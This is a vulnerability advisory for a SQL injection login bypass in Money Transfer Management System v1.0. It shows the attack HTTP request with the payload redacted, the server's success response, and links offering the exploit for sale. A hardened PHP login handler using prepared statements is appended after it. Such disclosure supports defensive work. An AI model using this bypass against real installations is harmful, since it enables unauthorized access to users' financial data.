Money Transfer Management System - MTMS- PHP 1.0 SQLi-Bypass Authentication
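Money Transfer Management System (MTMS) v1.0 contains a SQL injection vulnerability: an attacker can bypass authentication through the username parameter, logging in without a password and obtaining sensitive information. 2025-4-24 16:54:58 Author: cxsecurity.com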


# Titles: Money Transfer Management System - MTMS- PHP (by: oretnom23 ) v1.0 SQLi-Bypass Authentication
# Author: nu11secur1ty
# Date: 04/24/2025
# Vendor: https://github.com/oretnom23
# Software: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html
# Reference: https://portswigger.net/web-security/sql-injection

## Description:
The username parameter is vulnerable to SQL injection that bypasses authentication. The parameter is not properly sanitized. Regardless of whether the password has been changed, an attacker who reaches the system online can log in very easily WITHOUT A PASSWORD, using ONLY THE USER field, and can crash the system or obtain all of its sensitive information.

STATUS: HIGH-CRITICAL Vulnerability

[+]Exploit:
- SQLi:

```http
POST /mtms/classes/Login.php?f=login HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=jbnk1aq9koik72ud3g4stt6ik3
Content-Length: 44
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/mtms/admin/login.php
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

username=_the_exploit_here_&password=
```

[+]Response:

```http
HTTP/1.1 200 OK
Date: Thu, 24 Apr 2025 06:48:30 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

{"status":"success"}
```

# Reproduce: [href](https://www.patreon.com/posts/money-transfer-0-127342523)
# Buy an exploit only: [href](https://satoshidisk.com/pay/COEb97)
# Time spent: 00:15:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
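A hardened form of a login handler like the one the advisory targets, as an added example that is not MTMS source code and not the advisory author's: the username is bound as a prepared-statement parameter and the password is always checked with `password_verify()`. The `users` table and its columns, the `MTMS_DB_*` environment variables, `password_hash()` storage and the `failed` status value are assumptions.

```php
<?php
// Added example: not MTMS source code. Table/column names, the MTMS_DB_*
// environment variables and password_hash() storage are assumptions.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/** Returns the user id on valid credentials, null otherwise. */
function authenticate(mysqli $db, string $username, string $password): ?int
{
    // An empty password never authenticates, whatever the query returns.
    if ($username === '' || $password === '') {
        return null;
    }

    // The username travels as a bound parameter, so quotes or comment
    // markers in it are compared as data and never parsed as SQL.
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($id, $hash);
    $found = $stmt->fetch() === true;
    $stmt->close();

    // Verify against a throwaway hash for unknown users so both paths do
    // comparable work; the password decides the outcome, not the row count.
    static $dummy = null;
    $dummy ??= password_hash(bin2hex(random_bytes(16)), PASSWORD_DEFAULT);
    $valid = password_verify($password, $found ? (string) $hash : $dummy);

    return ($found && $valid) ? (int) $id : null;
}

// Request handling: same JSON shape as the response shown in the advisory
// ("failed" is an assumed value for the negative case).
if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $db = new mysqli(getenv('MTMS_DB_HOST') ?: null, getenv('MTMS_DB_USER') ?: null,
                     getenv('MTMS_DB_PASS') ?: null, getenv('MTMS_DB_NAME') ?: null);
    session_start();
    $user = is_string($_POST['username'] ?? null) ? $_POST['username'] : '';
    $pass = is_string($_POST['password'] ?? null) ? $_POST['password'] : '';
    $userId = authenticate($db, $user, $pass);
    if ($userId !== null) {
        session_regenerate_id(true);   // drop any pre-login session id
        $_SESSION['user_id'] = $userId;
    }
    header('Content-Type: application/json');
    echo json_encode(['status' => $userId !== null ? 'success' : 'failed']);
}
```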



 



Source: https://cxsecurity.com/issue/WLB-2025040032